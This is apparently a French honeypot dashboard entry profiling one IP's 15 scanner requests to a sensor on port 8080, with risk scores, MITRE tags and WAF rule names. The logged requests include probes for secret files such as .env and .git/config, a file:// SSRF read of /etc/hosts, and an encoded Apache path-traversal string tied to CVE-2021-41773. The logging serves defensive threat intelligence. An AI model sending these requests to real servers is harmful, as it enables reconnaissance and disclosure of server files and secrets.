Profil de menace
Activité suspecte — risque 46/100 (Moyen) — MITRE T1083 — confiance 97 % — via HTTP
Activité suspecte — risque 46/100 (Moyen) — MITRE T1083 — confiance 97 % — via HTTP
Synthèse décisionnelle honeypot — seuil de listing maintenu à 1 événement qualifié.
Sonde fichier sensible: chemin sensible (tag interne) · Correspondance tags WAF · Sonde fichier sensible / config · confiance 97%
Confiance 97 % — Score WAF 8
ASN 14618 · 18.232.0.0/14 · ARIN — 8 pair(s) ASN/FAI listé(s) — activité locale élevée vs pairs · 15 événements sur la période pour cette IP.
Même FAI Amazon.com, Inc. — corrélation indicative.
Origine réseau déclarée
Opérateur et dernière activité ban
Score capteur — surveiller, investiguer ou bloquer.
Les dates De/À priment sur la période. Affinez protocole, port, service et classification.
15 événements filtrés — activité quotidienne
Top ports ciblés sur les dernières 24 heures
SSH 22, RDP 3389, HTTP alternatifs…
Web, SSH, SAP, scans…
Intensité par jour et heure (UTC capteur)
15 événement(s) — page 1/1
| Horodatage | Proto | Port | Service | Classification | Sévérité | Risque | Actions |
|---|---|---|---|---|---|---|---|
| TCP | 8080 · HTTP | http | Sonde fichier configuration config file probe · via HTTP:8080 · (tentative d'exploit) · → /server-status | Élevée | Moyen · 46 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /server-status UA l9explore/1.2.2
Émulateur
HTTP
WAF
0
Recommandation
Surveiller
Tags
Cible HTTP
GET
/server-status
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8080
Chemin / cible
/server-status
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: chemin sensible (tag interne) · Correspondance tags WAF · Sonde fichier sensible / config · confiance 97%
Confiance classification
97%
Risque capteur
Moyen
· 46
Confiance : Confiance 97 % — 3 signal(aux) capteur
Protocole émulé
1
Signaux
Http Sensitive
Upstream
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
l9explore/1.2.2
Règles WAF
—
Payload (extrait)
GET /server-status HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: l9explore/1.2.2 Accept-Encoding: gzip Connection: close |
|||||||
| TCP | 8080 · HTTP | http | jenkins probe jenkins probe · via HTTP:8080 · (sonde / probe) · → /login.action | Élevée | Faible · 35 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
GET /login.action UA l9explore/1.2.2
Émulateur
HTTP
WAF
0
Recommandation
Surveiller
Tags
Cible HTTP
GET
/login.action
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8080
Chemin / cible
/login.action
Service
HTTP
Pourquoi cette classification : Type « jenkins_probe » (signaux protocolaires) · confiance 47%
Confiance classification
47%
Confiance modérée — signal unique
Risque capteur
Faible
· 35
Confiance : Confiance 47 % — Motif catalogue confirmé
Protocole émulé
1
Signaux
Cicd Jenkins
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Ligne de requête
User-Agent
l9explore/1.2.2
Règles WAF
—
Payload (extrait)
GET /login.action HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: l9explore/1.2.2 Accept-Encoding: gzip Connection: close |
|||||||
| TCP | 8080 · HTTP | http | Sonde HTTP Sonde HTTP · via HTTP:8080 · (sonde / probe) · → /telescope/requests | Élevée | Moyen · 40 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
GET /telescope/requests UA l9explore/1.2.2
Émulateur
HTTP
WAF
6
Recommandation
Surveiller
Tags
Cible HTTP
GET
/telescope/requests
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8080
Chemin / cible
/telescope/requests
Service
HTTP
Pourquoi cette classification : Sonde HTTP (tag nosqli-3) · confiance 71%
Confiance classification
71%
Risque capteur
Moyen
· 40
Confiance : Confiance 71 % — Score WAF 32 · 1 tag(s) WAF
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Ligne de requête
User-Agent
l9explore/1.2.2
Règles WAF
nosqli-3
Payload (extrait)
GET /telescope/requests HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: l9explore/1.2.2 Accept-Encoding: gzip Connection: close |
|||||||
| TCP | 8080 · HTTP | http | Sonde HTTP Sonde HTTP · via HTTP:8080 · (sonde / probe) · → /info.php | Élevée | Moyen · 40 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
GET /info.php UA l9explore/1.2.2
Émulateur
HTTP
WAF
0
Recommandation
Surveiller
Tags
Cible HTTP
GET
/info.php
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8080
Chemin / cible
/info.php
Service
HTTP
Pourquoi cette classification : Type « web_probe » (signaux protocolaires) · confiance 68%
Confiance classification
68%
Risque capteur
Moyen
· 40
Confiance : Confiance 68 % — Score WAF 8
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Ligne de requête
User-Agent
l9explore/1.2.2
Règles WAF
—
Payload (extrait)
GET /info.php HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: l9explore/1.2.2 Accept-Encoding: gzip Connection: close |
|||||||
| TCP | 8080 · HTTP | http | Sonde fichier configuration config file probe · via HTTP:8080 · (tentative d'exploit) · → /.git/config | Élevée | Moyen · 57 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /.git/config UA l9explore/1.2.2
Émulateur
HTTP
WAF
14
Recommandation
Investiguer
Tags
Cible HTTP
GET
/.git/config
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8080
Chemin / cible
/.git/config
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: chemin sensible (tag interne) · Règle WAF « nosqli-3 » · Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 57
Confiance : Confiance 100 % — Motif catalogue confirmé · 2 tag(s) WAF
Protocole émulé
1
Signaux
SIGMA-web-config-leak
Http Sensitive
pat-0198
Upstream
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
Probe /.git/config
Ligne de requête
User-Agent
l9explore/1.2.2
Règles WAF
nosqli-3
leak-0
Payload (extrait)
GET /.git/config HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: l9explore/1.2.2 Accept-Encoding: gzip Connection: close |
|||||||
| TCP | 8080 · HTTP | http | Sonde HTTP Sonde HTTP · via HTTP:8080 · (sonde / probe) · → /idx_config/ | Élevée | Moyen · 40 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
GET /idx_config/ UA l9explore/1.2.2
Émulateur
HTTP
WAF
6
Recommandation
Surveiller
Tags
Cible HTTP
GET
/idx_config/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8080
Chemin / cible
/idx_config/
Service
HTTP
Pourquoi cette classification : Sonde HTTP (tag nosqli-3) · confiance 71%
Confiance classification
71%
Risque capteur
Moyen
· 40
Confiance : Confiance 71 % — Score WAF 32 · 1 tag(s) WAF
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Ligne de requête
User-Agent
l9explore/1.2.2
Règles WAF
nosqli-3
Payload (extrait)
GET /idx_config/ HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: l9explore/1.2.2 Accept-Encoding: gzip Connection: close |
|||||||
| TCP | 8080 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8080 · (tentative d'exploit) · → /etc/hosts | Élevée | Critique · 85 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /etc/hosts UA l9explore/1.2.2
Émulateur
HTTP
WAF
43
Recommandation
Bloquer (recommandé)
Tags
Cible HTTP
GET
/etc/hosts
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8080
Chemin / cible
/etc/hosts
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Risque capteur
Critique
· 85
Confiance : Confiance 100 % — Motif catalogue confirmé · 7 tag(s) WAF
Protocole émulé
1
Signaux
pat-0716
CRS-930100-sub
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930130 LFI
CRS 934110 file scheme
CRS 930160 etc passwd
SSRF file:// SSRF
LFI file:// wrapper
LFI Double-dot bypass
Ligne de requête
User-Agent
l9explore/1.2.2
Règles WAF
lfi-7
ssrf-3
nosqli-3
redir-1
k8s-api
ssrf-linklocal
Payload (extrait)
GET /api/geojson?url=file:///etc/hosts HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: l9explore/1.2.2 Accept-Encoding: gzip Conn
Requête brute (extrait)
GET /api/geojson?url=file:///etc/hosts HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: l9explore/1.2.2 Accept-Encoding: gzip Connection: close |
|||||||
| TCP | 8080 · HTTP | http | Sonde fichier configuration config file probe · via HTTP:8080 · (tentative d'exploit) · → /config.json | Élevée | Moyen · 47 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /config.json UA l9explore/1.2.2
Émulateur
HTTP
WAF
0
Recommandation
Surveiller
Tags
Cible HTTP
GET
/config.json
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8080
Chemin / cible
/config.json
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: fichier configuration · Correspondance tags WAF · Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 47
Confiance : Confiance 100 % — Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Sensitive
pat-0247
Upstream
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
Probe /config.json
Ligne de requête
User-Agent
l9explore/1.2.2
Règles WAF
—
Payload (extrait)
GET /config.json HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: l9explore/1.2.2 Accept-Encoding: gzip Connection: close |
|||||||
| TCP | 8080 · HTTP | http | Sonde HTTP Sonde HTTP · via HTTP:8080 · (sonde / probe) · → /.json | Élevée | Moyen · 40 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
GET /.json UA l9explore/1.2.2
Émulateur
HTTP
WAF
0
Recommandation
Surveiller
Tags
Cible HTTP
GET
/.json
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8080
Chemin / cible
/.json
Service
HTTP
Pourquoi cette classification : Type « web_probe » (signaux protocolaires) · confiance 68%
Confiance classification
68%
Risque capteur
Moyen
· 40
Confiance : Confiance 68 % — Score WAF 8
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Ligne de requête
User-Agent
l9explore/1.2.2
Règles WAF
—
Payload (extrait)
GET /.json HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: l9explore/1.2.2 Accept-Encoding: gzip Connection: close |
|||||||
| TCP | 8080 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8080 · (tentative d'exploit) · → /s/lkx/_/;/META-INF/maven/com.atlassian.jira/ji… | Élevée | Moyen · 61 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
GET /s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties UA l9explore/1.2.2
Émulateur
HTTP
WAF
21
Recommandation
Investiguer
Tags
Cible HTTP
GET
/s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8080
Chemin / cible
/s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 59%
Confiance classification
59%
Risque capteur
Moyen
· 61
Confiance : Confiance 59 % — 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-930100-sub
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
l9explore/1.2.2
Règles WAF
lfi-14
rce-0
nosqli-3
Payload (extrait)
GET /s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: l9
Requête brute (extrait)
GET /s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: l9explore/1.2.2 Accept-Encoding: gzip Connection: close |
|||||||
| TCP | 8080 · HTTP | http | Sonde fichier configuration config file probe · via HTTP:8080 · (tentative d'exploit) · → /.DS_Store | Élevée | Moyen · 47 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /.DS_Store UA Go-http-client/1.1
Émulateur
HTTP
WAF
8
Recommandation
Surveiller
Tags
Cible HTTP
GET
/.DS_Store
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8080
Chemin / cible
/.DS_Store
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: chemin sensible (tag interne) · Règle WAF « leak-7 » · Sonde fichier sensible / config · confiance 97%
Confiance classification
97%
Risque capteur
Moyen
· 47
Confiance : Confiance 97 % — 1 tag(s) WAF
Protocole émulé
1
Signaux
Http Sensitive
Upstream
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
Probe /.DS_Store
Ligne de requête
User-Agent
Go-http-client/1.1
Règles WAF
leak-7
Payload (extrait)
GET /.DS_Store HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: Go-http-client/1.1 Accept-Encoding: gzip Connection: close |
|||||||
| TCP | 8080 · HTTP | http | Sonde fichier configuration config file probe · via HTTP:8080 · (tentative d'exploit) · → /.env | Élevée | Moyen · 48 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /.env UA l9explore/1.2.2
Émulateur
HTTP
WAF
8
Recommandation
Surveiller
Tags
Cible HTTP
GET
/.env
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8080
Chemin / cible
/.env
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: fichier configuration · Règle WAF « leak-1 » · Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 48
Confiance : Confiance 100 % — Motif catalogue confirmé · 1 tag(s) WAF
Protocole émulé
1
Signaux
SIGMA-web-config-leak
Http Sensitive
pat-0191
Upstream
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
Probe /.env
Ligne de requête
User-Agent
l9explore/1.2.2
Règles WAF
leak-1
Payload (extrait)
GET /.env HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: l9explore/1.2.2 Accept-Encoding: gzip Connection: close |
|||||||
| TCP | 8080 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8080 · (tentative d'exploit) · → /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2… | Élevée | Moyen · 59 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts UA Lkx-Apache2449TraversalPlugin/0.0.1 (+https://leakix.net/, +htt…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8080
Chemin / cible
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: traversal ../ · User-Agent scanner commercial déclaré · Règle WAF « lfi-0 » · Traversal / LFI dans le chemin
Confiance classification
100%
Risque capteur
Moyen
· 59
Confiance : Confiance 100 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
CRS-930100
Http Lfi
pat-0189
pat-0190
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CVE-2021-41773 Apache CVE-2021-41773
CVE-2021-42013 Apache CVE-2021-42013
CRS 930160 etc passwd
LFI Path traversal encoded
LFI Double-dot bypass
LFI Apache path normalization
Ligne de requête
User-Agent
Lkx-Apache2449TraversalPlugin/0.0.1 (+https://leakix.net/, +https://twitter.com/HaboubiAnis)
Règles WAF
lfi-0
ssrf-3
nosqli-3
Payload (extrait)
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts HTTP/1.1 Host: 62.3.50.33:8080 User-Agent:
Requête brute (extrait)
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: Lkx-Apache2449TraversalPlugin/0.0.1 (+https://leakix.net/, +https://twitter.com/HaboubiAnis) Accept-Encoding: gzip Connection |
|||||||
| TCP | 8080 · HTTP | http | Sonde HTTP Sonde HTTP · via HTTP:8080 · (sonde / probe) | Élevée | Moyen · 40 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
GET / UA l9tcpid/v1.1.0
Émulateur
HTTP
WAF
3
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8080
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Sonde HTTP (tag sap-sapcontrol-path) · confiance 71%
Confiance classification
71%
Risque capteur
Moyen
· 40
Confiance : Confiance 71 % — Score WAF 20 · 1 tag(s) WAF
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Ligne de requête
User-Agent
l9tcpid/v1.1.0
Règles WAF
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33 User-Agent: l9tcpid/v1.1.0 Connection: close |
|||||||
| TCP | 8080 · HTTP | http | Sonde HTTP Sonde HTTP · via HTTP:8080 · (sonde / probe) | Élevée | Moyen · 40 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
GET /
Émulateur
HTTP
WAF
3
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8080
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Sonde HTTP (tag sap-sapcontrol-path) · confiance 80%
Confiance classification
80%
Risque capteur
Moyen
· 40
Confiance : Confiance 80 % — Score WAF 20 · 1 tag(s) WAF
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Ligne de requête
User-Agent
—
Règles WAF
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: HELP EHLO leakix.net ? |
|||||||